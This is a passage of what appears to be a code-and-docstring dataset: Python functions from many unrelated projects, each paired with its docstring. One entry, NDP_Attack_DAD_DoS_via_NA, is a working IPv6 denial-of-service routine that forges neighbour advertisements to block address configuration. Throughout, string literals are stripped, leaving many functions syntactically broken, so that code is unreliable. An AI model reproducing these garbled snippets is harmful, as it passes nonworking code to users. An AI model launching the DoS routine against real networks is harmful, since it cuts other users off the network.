"FileName TEXT UNIQUE NOT NULL, "
"ShowID INTEGER, "
"FOREIGN KEY (ShowID) REFERENCES ShowName(ShowID))")
db.execute("CREATE TABLE SeasonDir ("
"ShowID INTEGER, "
"Season INTEGER NOT NULL, "
"SeasonDir TEXT NOT NULL, "
"FOREIGN KEY (ShowID) REFERENCES ShowName(ShowID),"
"CONSTRAINT SeasonDirPK PRIMARY KEY (ShowID,Season))")
db.commit()
goodlogging.Log.Info("DB", "Database initialisation complete", verbosity=self.logVerbosity) | Create all database tables. |
11,134 | def __getCashToBuyStock(self):
account=self.__strategy.getAccountCopy()
if (account.getCash() >= account.getTotalValue() / self.buying_ratio):
return account.getTotalValue() / self.buying_ratio
else:
return 0 | calculate the amount of money to buy stock |
11,135 | def write_main(self):
main_section =
main_header = self.write_main_header()
main_section = main_section + main_header
main_section = main_section +
wf_declarations_to_write = self.write_main_wfdeclarations()
main_section = main_section + wf_declarations_to_write
jobs_to_write = self.write_main_jobwrappers()
main_section = main_section + jobs_to_write
if self.destBucket:
main_destbucket = self.write_main_destbucket()
main_section = main_section + main_destbucket
return main_section | Writes out a huge string representing the main section of the python
compiled toil script.
Currently looks at and writes 5 sections:
1. JSON Variables (includes importing and preparing files as tuples)
2. TSV Variables (includes importing and preparing files as tuples)
3. CSV Variables (includes importing and preparing files as tuples)
4. Wrapping each WDL "task" function as a toil job
5. List out children and encapsulated jobs by priority, then start job0.
This should create variable declarations necessary for function calls.
Map file paths appropriately and store them in the toil fileStore so
that they are persistent from job to job. Create job wrappers for toil.
And finally write out, and run the jobs in order of priority using the
addChild and encapsulate commands provided by toil.
:return: giant string containing the main def for the toil script. |
11,136 | def inferRowCompat(self, distribution):
if self.hack_ is None:
self.clean_outcpd()
return self.hack_.vecMaxProd(distribution) | Equivalent to the category inference of zeta1.TopLevel.
Computes the max_prod (maximum component of a component-wise multiply)
between the rows of the histogram and the incoming distribution.
May be slow if the result of clean_outcpd() is not valid.
:param distribution: Array of length equal to the number of columns.
:returns: array of length equal to the number of rows. |
11,137 | def compile_vocab(docs, limit=1e6, verbose=0, tokenizer=Tokenizer(stem=None, lower=None, strip=None)):
tokenizer = make_tokenizer(tokenizer)
d = Dictionary()
try:
limit = min(limit, docs.count())
docs = docs.iterator()
except (AttributeError, TypeError):
pass
for i, doc in enumerate(docs):
try:
doc = doc.values()
except AttributeError:
if not isinstance(doc, str):
doc = .join([str(v) for v in doc])
else:
doc = str(doc)
if i >= limit:
break
d.add_documents([list(tokenizer(doc))])
if verbose and not i % 100:
log.info(.format(i, repr(d)[:120]))
return d | Get the set of words used anywhere in a sequence of documents and assign an integer id
This vectorizer is much faster than the scikit-learn version (and only requires low/constant RAM ?).
>>> gen = ('label: ' + chr(ord('A') + i % 3)*3 for i in range(11))
>>> d = compile_vocab(gen, verbose=0)
>>> d
<gensim.corpora.dictionary.Dictionary ...>
>>> print(d)
Dictionary(4 unique tokens: [u'AAA', u'BBB', u'CCC', u'label'])
>>> sorted(d.token2id.values())
[0, 1, 2, 3]
>>> sorted(d.token2id.keys())
[u'AAA', u'BBB', u'CCC', u'label'] |
11,138 | def search_messages(session, thread_id, query, limit=20,
offset=0, message_context_details=None,
window_above=None, window_below=None):
query = {
: thread_id,
: query,
: limit,
: offset
}
if message_context_details:
query[] = message_context_details
if window_above:
query[] = window_above
if window_below:
query[] = window_below
response = make_get_request(session, , params_data=query)
json_data = response.json()
if response.status_code == 200:
return json_data[]
else:
raise MessagesNotFoundException(
message=json_data[],
error_code=json_data[],
request_id=json_data[]
) | Search for messages |
11,139 | def prepare_dispatches():
dispatches = []
target_messages = Message.get_without_dispatches()
cache = {}
for message_model in target_messages:
if message_model.cls not in cache:
message_cls = get_registered_message_type(message_model.cls)
subscribers = message_cls.get_subscribers()
cache[message_model.cls] = (message_cls, subscribers)
else:
message_cls, subscribers = cache[message_model.cls]
dispatches.extend(message_cls.prepare_dispatches(message_model))
return dispatches | Automatically creates dispatches for messages without them.
:return: list of Dispatch
:rtype: list |
11,140 | def greaterThan(self, value):
newq = self.copy()
newq.setOp(Query.Op.GreaterThan)
newq.setValue(value)
return newq | Sets the operator type to Query.Op.GreaterThan and sets the
value to the inputted value.
:param value <variant>
:return <Query>
:sa __gt__
:usage |>>> from orb import Query as Q
|>>> query = Q('test').greaterThan(1)
|>>> print query
|test greater_than 1 |
11,141 | def write_error(self, status_code, **kwargs):
if "exc_info" in kwargs:
exc_info = kwargs["exc_info"]
error = exc_info[1]
errormessage = "%s: %s" % (status_code, error)
self.render("error.html", errormessage=errormessage)
else:
errormessage = "%s" % (status_code)
self.render("error.html", errormessage=errormessage) | :param status_code:
:param kwargs:
:return: |
11,142 | def macontrol(self, data: [, str] = None,
ewmachart: str = None,
machart: str = None,
procopts: str = None,
stmtpassthrough: str = None,
**kwargs: dict) -> :
| Python method to call the MACONTROL procedure
Documentation link:
https://go.documentation.sas.com/?cdcId=pgmsascdc&cdcVersion=9.4_3.4&docsetId=qcug&docsetTarget=qcug_macontrol_toc.htm&locale=en
:param data: SASdata object or string. This parameter is required.
:parm ewmachart: The ewmachart variable can only be a string type.
:parm machart: The machart variable can only be a string type.
:parm procopts: The procopts variable is a generic option available for advanced use. It can only be a string type.
:parm stmtpassthrough: The stmtpassthrough variable is a generic option available for advanced use. It can only be a string type.
:return: SAS Result Object |
11,143 | def get_edit_token(self):
if not self.edit_token or (time.time() - self.instantiation_time) > self.token_renew_period:
self.generate_edit_credentials()
self.instantiation_time = time.time()
return self.edit_token | Can be called in order to retrieve the edit token from an instance of WDLogin
:return: returns the edit token |
11,144 | async def disconnect(self):
self._is_shutdown = True
self.ready.clear()
self.update_state(NodeState.DISCONNECTING)
await self.player_manager.disconnect()
if self._ws is not None and self._ws.open:
await self._ws.close()
if self._listener_task is not None and not self.loop.is_closed():
self._listener_task.cancel()
self._state_handlers = []
_nodes.remove(self)
log.debug("Shutdown Lavalink WS.") | Shuts down and disconnects the websocket. |
11,145 | def lvscan(self):
self.open()
lv_list = []
lv_handles = lvm_vg_list_lvs(self.handle)
if not bool(lv_handles):
return lv_list
lvh = dm_list_first(lv_handles)
while lvh:
c = cast(lvh, POINTER(lvm_lv_list))
lv = LogicalVolume(self, lvh=c.contents.lv)
lv_list.append(lv)
if dm_list_end(lv_handles, lvh):
break
lvh = dm_list_next(lv_handles, lvh)
self.close()
return lv_list | Probes the volume group for logical volumes and returns a list of
LogicalVolume instances::
from lvm2py import *
lvm = LVM()
vg = lvm.get_vg("myvg")
lvs = vg.lvscan()
*Raises:*
* HandleError |
11,146 | def save(self, filename=None, *, gzipped=None, byteorder=None):
if gzipped is None:
gzipped = self.gzipped
if filename is None:
filename = self.filename
if filename is None:
raise ValueError()
open_file = gzip.open if gzipped else open
with open_file(filename, ) as buff:
self.write(buff, byteorder or self.byteorder) | Write the file at the specified location.
The `gzipped` keyword only argument indicates if the file should
be gzipped. The `byteorder` keyword only argument lets you
specify whether the file should be big-endian or little-endian.
If the method is called without any argument, it will default to
the instance attributes and use the file's `filename`,
`gzipped` and `byteorder` attributes. Calling the method without
a `filename` will raise a `ValueError` if the `filename` of the
file is `None`. |
11,147 | def server_exists(s_name, ip=None, s_state=None, **connection_args):
*serverName
server = _server_get(s_name, **connection_args)
if server is None:
return False
if ip is not None and ip != server.get_ipaddress():
return False
if s_state is not None and s_state.upper() != server.get_state():
return False
return True | Checks if a server exists
CLI Example:
.. code-block:: bash
salt '*' netscaler.server_exists 'serverName' |
11,148 | def _map_block_index_to_location(ir_blocks):
block_index_to_location = {}
current_block_ixs = []
for num, ir_block in enumerate(ir_blocks):
if isinstance(ir_block, blocks.GlobalOperationsStart):
if len(current_block_ixs) > 0:
unassociated_blocks = [ir_blocks[ix] for ix in current_block_ixs]
raise AssertionError(
u
u.format(unassociated_blocks))
break
current_block_ixs.append(num)
if isinstance(ir_block, blocks.MarkLocation):
for ix in current_block_ixs:
block_index_to_location[ix] = ir_block.location
current_block_ixs = []
return block_index_to_location | Associate each IR block with its corresponding location, by index. |
11,149 | def save_anim(self, fig, animate, init, bitrate=10000, fps=30):
from matplotlib import animation
anim = animation.FuncAnimation(fig, animate, init_func=init, frames=360, interval=20)
FFMpegWriter = animation.writers[]
writer = FFMpegWriter(bitrate= bitrate, fps=fps)
self.avi_path = self.base_dir + self.short_name +
anim.save(self.avi_path, writer=writer, codec=) | Not functional -- TODO |
11,150 | def count(self):
if self._total_count is None:
self._total_count = self._get_total_count()
return self._total_count | Approximate number of results, according to the API |
11,151 | def fetch(self, start=False, full_data=True):
if self.id is None:
return self
if full_data is True:
fields = None
elif isinstance(full_data, dict):
fields = full_data
else:
fields = {
"_id": 0,
"path": 1,
"params": 1,
"status": 1,
"retry_count": 1,
}
if start:
self.datestarted = datetime.datetime.utcnow()
self.set_data(self.collection.find_and_modify(
{
"_id": self.id,
"status": {"$nin": ["cancel", "abort", "maxretries"]}
},
{"$set": {
"status": "started",
"datestarted": self.datestarted,
"worker": self.worker.id
},
"$unset": {
"dateexpires": 1
}},
projection=fields)
)
context.metric("jobs.status.started")
else:
self.set_data(self.collection.find_one({
"_id": self.id
}, projection=fields))
if self.data is None:
context.log.info(
"Job %s not found in MongoDB or status was cancelled!" %
self.id)
self.stored = True
return self | Get the current job data and possibly flag it as started. |
11,152 | def personal_sign(self, message, account, password=None):
return (yield from self.rpc_call(,
[message, account, password])) | https://github.com/ethereum/go-ethereum/wiki/Management-APIs#personal_sign
:param message: Message for sign
:type message: str
:param account: Account address
:type account: str
:param password: Password of account (optional)
:type password: str
:return: signature
:rtype: str |
11,153 | def _cut_to_pieces(self, bunch_stack):
stack_len = len(bunch_stack[0])
for i in xrange(0, stack_len, self.fragment_length):
yield np.array(map(lambda stack: stack[i: i + self.fragment_length], bunch_stack)) | :type bunch_stack: list of list of int |
11,154 | async def setup_hostname() -> str:
machine_id = open().read().strip()
hostname = machine_id[:6]
with open(, ) as ehn:
ehn.write(f)
LOG.debug("Setting hostname")
proc = await asyncio.create_subprocess_exec(
, , ,
stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE)
stdout, stderr = await proc.communicate()
ret = proc.returncode
if ret != 0:
LOG.error(
f
f)
raise RuntimeError("Couldnsystemctlrestartavahi-daemonError restarting avahi-daemon: {ret} stdout: {stdout} stderr: {stderr}')
raise RuntimeError("Error restarting avahi")
LOG.debug("Updated hostname and restarted avahi OK")
return hostname | Intended to be run when the server starts. Sets the machine hostname.
The machine hostname is set from the systemd-generated machine-id, which
changes at every boot.
Once the hostname is set, we restart avahi.
This is a separate task from establishing and changing the opentrons
machine name, which is UTF-8 and stored in /etc/machine-info as the
PRETTY_HOSTNAME and used in the avahi service name.
:returns: the hostname |
11,155 | def sign(self, value):
value = want_bytes(value)
timestamp = base64_encode(int_to_bytes(self.get_timestamp()))
sep = want_bytes(self.sep)
value = value + sep + timestamp
return value + sep + self.get_signature(value) | Signs the given string and also attaches a time information. |
11,156 | def modification_time(self):
timestamp = getattr(
self._cpio_archive_file_entry, , None)
if timestamp is None:
return None
return dfdatetime_posix_time.PosixTime(timestamp=timestamp) | dfdatetime.DateTimeValues: modification time or None if not available. |
11,157 | def register_type(self, typename):
typekey = typehash(typename)
if typekey in self._type_register:
raise ValueError("Type name collision. Type %s has the same hash." % repr(self._type_register[typekey]))
self._type_register[typekey] = typename | Registers a type name so that it may be used to send and receive packages.
:param typename: Name of the packet type. A method with the same name and a
"on_" prefix should be added to handle incomming packets.
:raises ValueError: If there is a hash code collision. |
11,158 | def issue_instant_ok(self):
upper = time_util.shift_time(time_util.time_in_a_while(days=1),
self.timeslack).timetuple()
lower = time_util.shift_time(time_util.time_a_while_ago(days=1),
-self.timeslack).timetuple()
issued_at = str_to_time(self.response.issue_instant)
return lower < issued_at < upper | Check that the response was issued at a reasonable time |
11,159 | def is_script(self, container):
try:
style = self._style(container)
return style.get_value(,
container) != TextPosition.NORMAL
except StyleException:
return False | Returns `True` if this styled text is super/subscript. |
11,160 | def _parse_proxy(proxy):
scheme, r_scheme = splittype(proxy)
if not r_scheme.startswith("/"):
scheme = None
authority = proxy
else:
if not r_scheme.startswith("//"):
raise ValueError("proxy URL with no authority: %r" % proxy)
end = r_scheme.find("/", 2)
if end == -1:
end = None
authority = r_scheme[2:end]
userinfo, hostport = splituser(authority)
if userinfo is not None:
user, password = splitpasswd(userinfo)
else:
user = password = None
return scheme, user, password, hostport | Return (scheme, user, password, host/port) given a URL or an authority.
If a URL is supplied, it must have an authority (host:port) component.
According to RFC 3986, having an authority component means the URL must
have two slashes after the scheme:
>>> _parse_proxy('file:/ftp.example.com/')
Traceback (most recent call last):
ValueError: proxy URL with no authority: 'file:/ftp.example.com/'
The first three items of the returned tuple may be None.
Examples of authority parsing:
>>> _parse_proxy('proxy.example.com')
(None, None, None, 'proxy.example.com')
>>> _parse_proxy('proxy.example.com:3128')
(None, None, None, 'proxy.example.com:3128')
The authority component may optionally include userinfo (assumed to be
username:password):
>>> _parse_proxy('joe:[email protected]')
(None, 'joe', 'password', 'proxy.example.com')
>>> _parse_proxy('joe:[email protected]:3128')
(None, 'joe', 'password', 'proxy.example.com:3128')
Same examples, but with URLs instead:
>>> _parse_proxy('http://proxy.example.com/')
('http', None, None, 'proxy.example.com')
>>> _parse_proxy('http://proxy.example.com:3128/')
('http', None, None, 'proxy.example.com:3128')
>>> _parse_proxy('http://joe:[email protected]/')
('http', 'joe', 'password', 'proxy.example.com')
>>> _parse_proxy('http://joe:[email protected]:3128')
('http', 'joe', 'password', 'proxy.example.com:3128')
Everything after the authority is ignored:
>>> _parse_proxy('ftp://joe:[email protected]/rubbish:3128')
('ftp', 'joe', 'password', 'proxy.example.com')
Test for no trailing '/' case:
>>> _parse_proxy('http://joe:[email protected]')
('http', 'joe', 'password', 'proxy.example.com') |
11,161 | def wait_for_current_tasks(self):
logger.info("Waiting for all remaining tasks to complete")
for task_id in self.tasks:
fut = self.tasks[task_id][]
if not fut.done():
logger.debug("Waiting for task {} to complete".format(task_id))
fut.exception()
logger.info("All remaining tasks completed") | Waits for all tasks in the task list to be completed, by waiting for their
AppFuture to be completed. This method will not necessarily wait for any tasks
added after cleanup has started (such as data stageout?) |
11,162 | def symmetry_reduce(tensors, structure, tol=1e-8, **kwargs):
sga = SpacegroupAnalyzer(structure, **kwargs)
symmops = sga.get_symmetry_operations(cartesian=True)
unique_mapping = TensorMapping([tensors[0]], [[]], tol=tol)
for tensor in tensors[1:]:
is_unique = True
for unique_tensor, symmop in itertools.product(unique_mapping, symmops):
if np.allclose(unique_tensor.transform(symmop), tensor, atol=tol):
unique_mapping[unique_tensor].append(symmop)
is_unique = False
break
if is_unique:
unique_mapping[tensor] = []
return unique_mapping | Function that converts a list of tensors corresponding to a structure
and returns a dictionary consisting of unique tensor keys with symmop
values corresponding to transformations that will result in derivative
tensors from the original list
Args:
tensors (list of tensors): list of Tensor objects to test for
symmetrically-equivalent duplicates
structure (Structure): structure from which to get symmetry
tol (float): tolerance for tensor equivalence
kwargs: keyword arguments for the SpacegroupAnalyzer
returns:
dictionary consisting of unique tensors with symmetry operations
corresponding to those which will reconstruct the remaining
tensors as values |
11,163 | def point_in_segment(ac, b):
onin
(a,c) = ac
abc = [np.asarray(u) for u in (a,b,c)]
if any(len(u.shape) > 1 for u in abc): (a,b,c) = [np.reshape(u,(len(u),-1)) for u in abc]
else: (a,b,c) = abc
vab = b - a
vbc = c - b
vac = c - a
dab = np.sqrt(np.sum(vab**2, axis=0))
dbc = np.sqrt(np.sum(vbc**2, axis=0))
dac = np.sqrt(np.sum(vac**2, axis=0))
return np.isclose(dab + dbc, dac) & ~np.isclose(dac,dab) & ~np.isclose(dac,dbc) | point_in_segment((a,b), c) yields True if point x is in segment (a,b) and False otherwise. Note
that this differs from point_on_segment in that a point that if c is equal to a or b it is
considered 'on' but not 'in' the segment. |
11,164 | def count_collisions(Collisions):
CollisionCount = 0
CollisionIndicies = []
lastval = True
for i, val in enumerate(Collisions):
if val == True and lastval == False:
CollisionIndicies.append(i)
CollisionCount += 1
lastval = val
return CollisionCount, CollisionIndicies | Counts the number of unique collisions and gets the collision index.
Parameters
----------
Collisions : array_like
Array of booleans, containing true if during a collision event, false otherwise.
Returns
-------
CollisionCount : int
Number of unique collisions
CollisionIndicies : list
Indicies of collision occurance |
11,165 | def exists(name=None, region=None, key=None, keyid=None, profile=None,
vpc_id=None, vpc_name=None, group_id=None):
conn = _get_conn(region=region, key=key, keyid=keyid, profile=profile)
group = _get_group(conn, name=name, vpc_id=vpc_id, vpc_name=vpc_name,
group_id=group_id, region=region, key=key, keyid=keyid,
profile=profile)
if group:
return True
else:
return False | Check to see if a security group exists.
CLI example::
salt myminion boto_secgroup.exists mysecgroup |
11,166 | def print_results(self):
if self.package_data.get():
print(.format(c.Style.BRIGHT, c.Fore.BLUE))
for p in self.package_data[]:
print(
.format(
p.get(), c.Style.BRIGHT, c.Fore.CYAN, p.get()
)
)
print(.format(c.Style.BRIGHT, c.Fore.BLUE))
for p in self.package_data[]:
if isinstance(p.get(), list):
n = 5
list_data = p.get()
print(
.format(
p.get(), c.Style.BRIGHT, c.Fore.CYAN, .join(p.get()[:n])
)
)
del list_data[:n]
for data in [
list_data[i : i + n] for i in range(0, len(list_data), n)
]:
print(
.format(
, c.Style.BRIGHT, c.Fore.CYAN, .join(data)
)
)
else:
print(
.format(
p.get(), c.Style.BRIGHT, c.Fore.CYAN, p.get()
)
)
if self.package_data.get():
print(.format(c.Style.BRIGHT, c.Fore.BLUE))
for p in self.package_data[]:
print(
.format(
p.get(), c.Style.BRIGHT, c.Fore.CYAN, p.get()
)
)
if not self.args.ignore_validation:
print()
for error in self.package_data.get():
print(.format(c.Fore.RED, error))
self.exit_code = 1 | Print results of the package command. |
11,167 | def NDP_Attack_DAD_DoS_via_NA(iface=None, mac_src_filter=None, tgt_filter=None,
reply_mac=None):
def na_reply_callback(req, reply_mac, iface):
mac = req[Ether].src
dst = req[IPv6].dst
tgt = req[ICMPv6ND_NS].tgt
rep = Ether(src=reply_mac) / IPv6(src=tgt, dst=dst)
rep /= ICMPv6ND_NA(tgt=tgt, S=0, R=0, O=1)
rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac)
sendp(rep, iface=iface, verbose=0)
print("Reply NA for target address %s (received from %s)" % (tgt, mac))
_NDP_Attack_DAD_DoS(na_reply_callback, iface, mac_src_filter,
tgt_filter, reply_mac) | Perform the DAD DoS attack using NS described in section 4.1.3 of RFC
3756. This is done by listening incoming NS messages *sent from the
unspecified address* and sending a NA reply for the target address,
leading the peer to believe that another node is also performing DAD
for that address.
By default, the fake NA sent to create the DoS uses:
- as target address the target address found in received NS.
- as IPv6 source address: the target address found in received NS.
- as IPv6 destination address: the link-local solicited-node multicast
address derived from the target address in received NS.
- the mac address of the interface as source (or reply_mac, see below).
- the multicast mac address derived from the solicited node multicast
address used as IPv6 destination address.
- A Target Link-Layer address option (ICMPv6NDOptDstLLAddr) filled
with the mac address used as source of the NA.
Following arguments can be used to change the behavior:
iface: a specific interface (e.g. "eth0") of the system on which the
DoS should be launched. If None is provided conf.iface is used.
mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
Only NS messages received from this source will trigger replies.
This allows limiting the effects of the DoS to a single target by
filtering on its mac address. The default value is None: the DoS
is not limited to a specific mac address.
tgt_filter: Same as previous but for a specific target IPv6 address for
received NS. If the target address in the NS message (not the IPv6
destination address) matches that address, then a fake reply will
be sent, i.e. the emitter will be a target of the DoS.
reply_mac: allow specifying a specific source mac address for the reply,
i.e. to prevent the use of the mac address of the interface. This
address will also be used in the Target Link-Layer Address option. |
11,168 | def cover(self, match_set):
assert isinstance(match_set, MatchSet)
assert match_set.model.algorithm is self
condition = bitstrings.BitCondition.cover(
match_set.situation,
self.wildcard_probability
)
action_candidates = (
frozenset(match_set.model.possible_actions) -
frozenset(match_set)
)
if not action_candidates:
action_candidates = match_set.model.possible_actions
action = random.choice(list(action_candidates))
return XCSClassifierRule(
condition,
action,
self,
match_set.time_stamp
) | Return a new classifier rule that can be added to the match set,
with a condition that matches the situation of the match set and an
action selected to avoid duplication of the actions already
contained therein. The match_set argument is a MatchSet instance
representing the match set to which the returned rule may be added.
Usage:
match_set = model.match(situation)
if model.algorithm.covering_is_required(match_set):
new_rule = model.algorithm.cover(match_set)
assert new_rule.condition(situation)
model.add(new_rule)
match_set = model.match(situation)
Arguments:
match_set: A MatchSet instance.
Return:
A new ClassifierRule instance, appropriate for the addition to
match_set and to the classifier set from which match_set was
drawn. |
11,169 | def matching_tokens(self, text, start=0):
for token_class, regexp in self._tokens:
match = regexp.match(text, pos=start)
if match:
yield token_class, match | Retrieve all token definitions matching the beginning of a text.
Args:
text (str): the text to test
start (int): the position where matches should be searched in the
string (see re.match(rx, txt, pos))
Yields:
(token_class, re.Match): all token class whose regexp matches the
text, and the related re.Match object. |
11,170 | def install(args: List[str]) -> None:
with clean_pip_env():
subprocess_env = os.environ.copy()
sitedir_index = _first_sitedir_index()
_extend_python_path(subprocess_env, sys.path[sitedir_index:])
process = subprocess.Popen(
[sys.executable, "-m", "pip", "--disable-pip-version-check", "install"] + args,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=subprocess_env,
)
for output in process.stdout:
if output:
click.echo(output.decode().rstrip())
if process.wait() > 0:
sys.exit(PIP_INSTALL_ERROR) | `pip install` as a function.
Accepts a list of pip arguments.
.. code-block:: py
>>> install(['numpy', '--target', 'site-packages'])
Collecting numpy
Downloading numpy-1.13.3-cp35-cp35m-manylinux1_x86_64.whl (16.9MB)
100% || 16.9MB 53kB/s
Installing collected packages: numpy
Successfully installed numpy-1.13.3 |
11,171 | def build_index_from_design(df, design, remove_prefix=None, types=None, axis=1, auto_convert_numeric=True, unmatched_columns=):
df = df.copy()
if not in design.index.names:
design = design.set_index()
if remove_prefix is None:
remove_prefix = []
if type(remove_prefix) is str:
remove_prefix=[remove_prefix]
unmatched_for_index = []
names = design.columns.values
idx_levels = len(names)
indexes = []
if auto_convert_numeric:
design = design.apply(pd.to_numeric, errors="ignore")
design.index = design.index.astype(str)
if types:
for n, t in types.items():
if n in design.columns.values:
design[n] = design[n].astype(t)
for lo in df.columns.values:
l = copy(lo)
for s in remove_prefix:
l = l.replace(s, )
l = l.strip()
l = numeric(l)
try:
idx = design.loc[str(l)]
except:
if unmatched_columns:
unmatched_for_index.append(lo)
else:
idx = tuple([None] * idx_levels)
indexes.append(idx)
else:
idx = tuple(idx.values)
indexes.append(idx)
if axis == 0:
df.index = pd.MultiIndex.from_tuples(indexes, names=names)
else:
if unmatched_columns == :
df = df.set_index(unmatched_for_index, append=True)
elif unmatched_columns == :
df = df.drop(unmatched_for_index, axis=1)
df.columns = pd.MultiIndex.from_tuples(indexes, names=names)
df = df.sort_index(axis=1)
return df | Build a MultiIndex from a design table.
Supply with a table with column headings for the new multiindex
and a index containing the labels to search for in the data.
:param df:
:param design:
:param remove:
:param types:
:param axis:
:param auto_convert_numeric:
:return: |
11,172 | def ics2task():
from argparse import ArgumentParser, FileType
from sys import stdin
parser = ArgumentParser(description=)
parser.add_argument(, nargs=, type=FileType(), default=stdin,
help=)
parser.add_argument(, nargs=, help=, default=expanduser())
args = parser.parse_args()
vobject = readOne(args.infile.read())
task = IcsTask(args.outdir)
for todo in vobject.vtodo_list:
task.to_task(todo) | Command line tool to convert from iCalendar to Taskwarrior |
11,173 | def _addToSegmentUpdates(self, c, i, segUpdate):
if segUpdate is None or len(segUpdate.activeSynapses) == 0:
return
key = (c, i)
if self.segmentUpdates.has_key(key):
self.segmentUpdates[key] += [(self.lrnIterationIdx, segUpdate)]
else:
self.segmentUpdates[key] = [(self.lrnIterationIdx, segUpdate)] | Store a dated potential segment update. The "date" (iteration index) is used
later to determine whether the update is too old and should be forgotten.
This is controlled by parameter ``segUpdateValidDuration``.
:param c: TODO: document
:param i: TODO: document
:param segUpdate: TODO: document |
11,174 | def obj_box_zoom(
im, classes=None, coords=None, zoom_range=(0.9,
1.1), row_index=0, col_index=1, channel_index=2, fill_mode=,
cval=0., order=1, is_rescale=False, is_center=False, is_random=False, thresh_wh=0.02, thresh_wh2=12.
):
if classes is None:
classes = []
if coords is None:
coords = []
if len(zoom_range) != 2:
raise Exception( , zoom_range)
if is_random:
if zoom_range[0] == 1 and zoom_range[1] == 1:
zx, zy = 1, 1
tl.logging.info(" random_zoom : not zoom in/out")
else:
zx, zy = np.random.uniform(zoom_range[0], zoom_range[1], 2)
else:
zx, zy = zoom_range
zoom_matrix = np.array([[zx, 0, 0], [0, zy, 0], [0, 0, 1]])
h, w = im.shape[row_index], im.shape[col_index]
transform_matrix = transform_matrix_offset_center(zoom_matrix, h, w)
im_new = affine_transform(im, transform_matrix, channel_index, fill_mode, cval, order)
def _get_coord(coord):
if is_center:
coord = obj_box_coord_centroid_to_upleft(coord)
x = (coord[0] - im.shape[1] / 2) / zy + im.shape[1] / 2
y = (coord[1] - im.shape[0] / 2) / zx + im.shape[0] / 2
w = coord[2] / zy
h = coord[3] / zx
if x < 0:
if x + w <= 0:
return None
w = w + x
x = 0
elif x > im_new.shape[1]:
return None
if y < 0:
if y + h <= 0:
return None
h = h + y
y = 0
elif y > im_new.shape[0]:
return None
if (x is not None) and (x + w > im_new.shape[1]):
w = im_new.shape[1] - x
if (y is not None) and (y + h > im_new.shape[0]):
h = im_new.shape[0] - y
if (w / (h + 1.) > thresh_wh2) or (h / (w + 1.) > thresh_wh2):
return None
if (w / (im_new.shape[1] * 1.) < thresh_wh) or (h / (im_new.shape[0] * 1.) <
thresh_wh):
return None
coord = [x, y, w, h]
if is_center:
coord = obj_box_coord_upleft_to_centroid(coord)
return coord
coords_new = list()
classes_new = list()
for i, _ in enumerate(coords):
coord = coords[i]
if len(coord) != 4:
raise AssertionError("coordinate should be 4 values : [x, y, w, h]")
if is_rescale:
coord = obj_box_coord_scale_to_pixelunit(coord, im.shape)
coord = _get_coord(coord)
if coord is not None:
coord = obj_box_coord_rescale(coord, im_new.shape)
coords_new.append(coord)
classes_new.append(classes[i])
else:
coord = _get_coord(coord)
if coord is not None:
coords_new.append(coord)
classes_new.append(classes[i])
return im_new, classes_new, coords_new | Zoom in and out of a single image, randomly or non-randomly, and compute the new bounding box coordinates.
Objects outside the cropped image will be removed.
Parameters
-----------
im : numpy.array
An image with dimension of [row, col, channel] (default).
classes : list of int or None
Class IDs.
coords : list of list of 4 int/float or None
Coordinates [[x, y, w, h], [x, y, w, h], ...].
zoom_range row_index col_index channel_index is_random fill_mode cval and order : see ``tl.prepro.zoom``.
is_rescale : boolean
Set to True, if the input coordinates are rescaled to [0, 1]. Default is False.
is_center : boolean
Set to True, if the x and y of coordinates are the centroid. (i.e. darknet format). Default is False.
thresh_wh : float
Threshold, remove the box if its ratio of width(height) to image size less than the threshold.
thresh_wh2 : float
Threshold, remove the box if its ratio of width to height or vice verse higher than the threshold.
Returns
-------
numpy.array
A processed image
list of int
A list of classes
list of list of 4 numbers
A list of new bounding boxes. |
11,175 | def concentric_circles_path(size):
width, height = size
x0, y0 = width // 2, height // 2
max_radius = int(sqrt(2) * max(height, width))
yield from fill_concentric_circles(radius=max_radius, center=(x0, y0), size=size) | Yields a set of paths that are concentric circles, moving outwards, about the center of the image.
:param size: The (width, height) of the image
:return: Yields individual circles, where each circle is a generator that yields pixel coordinates. |
11,176 | def getOverlayInputMethod(self, ulOverlayHandle):
fn = self.function_table.getOverlayInputMethod
peInputMethod = VROverlayInputMethod()
result = fn(ulOverlayHandle, byref(peInputMethod))
return result, peInputMethod | Returns the current input settings for the specified overlay. |
11,177 | def str(self, var, default=NOTSET, multiline=False):
value = self.get_value(var, default=default)
if multiline:
return value.replace(, )
return value | :rtype: str |
11,178 | def decompose_by_component(model, observed_time_series, parameter_samples):
with tf.compat.v1.name_scope(,
values=[observed_time_series]):
[
observed_time_series,
is_missing
] = sts_util.canonicalize_observed_time_series_with_mask(
observed_time_series)
num_timesteps = dist_util.prefer_static_value(
tf.shape(input=observed_time_series))[-2]
ssm = model.make_state_space_model(num_timesteps=num_timesteps,
param_vals=parameter_samples)
posterior_means, posterior_covs = ssm.posterior_marginals(
observed_time_series, mask=is_missing)
return _decompose_from_posterior_marginals(
model, posterior_means, posterior_covs, parameter_samples) | Decompose an observed time series into contributions from each component.
This method decomposes a time series according to the posterior represention
of a structural time series model. In particular, it:
- Computes the posterior marginal mean and covariances over the additive
model's latent space.
- Decomposes the latent posterior into the marginal blocks for each
model component.
- Maps the per-component latent posteriors back through each component's
observation model, to generate the time series modeled by that component.
Args:
model: An instance of `tfp.sts.Sum` representing a structural time series
model.
observed_time_series: `float` `Tensor` of shape
`batch_shape + [num_timesteps, 1]` (omitting the trailing unit dimension
is also supported when `num_timesteps > 1`), specifying an observed time
series. May optionally be an instance of `tfp.sts.MaskedTimeSeries`, which
includes a mask `Tensor` to specify timesteps with missing observations.
parameter_samples: Python `list` of `Tensors` representing posterior
samples of model parameters, with shapes `[concat([
[num_posterior_draws], param.prior.batch_shape,
param.prior.event_shape]) for param in model.parameters]`. This may
optionally also be a map (Python `dict`) of parameter names to
`Tensor` values.
Returns:
component_dists: A `collections.OrderedDict` instance mapping
component StructuralTimeSeries instances (elements of `model.components`)
to `tfd.Distribution` instances representing the posterior marginal
distributions on the process modeled by each component. Each distribution
has batch shape matching that of `posterior_means`/`posterior_covs`, and
event shape of `[num_timesteps]`.
#### Examples
Suppose we've built a model and fit it to data:
```python
day_of_week = tfp.sts.Seasonal(
num_seasons=7,
observed_time_series=observed_time_series,
name='day_of_week')
local_linear_trend = tfp.sts.LocalLinearTrend(
observed_time_series=observed_time_series,
name='local_linear_trend')
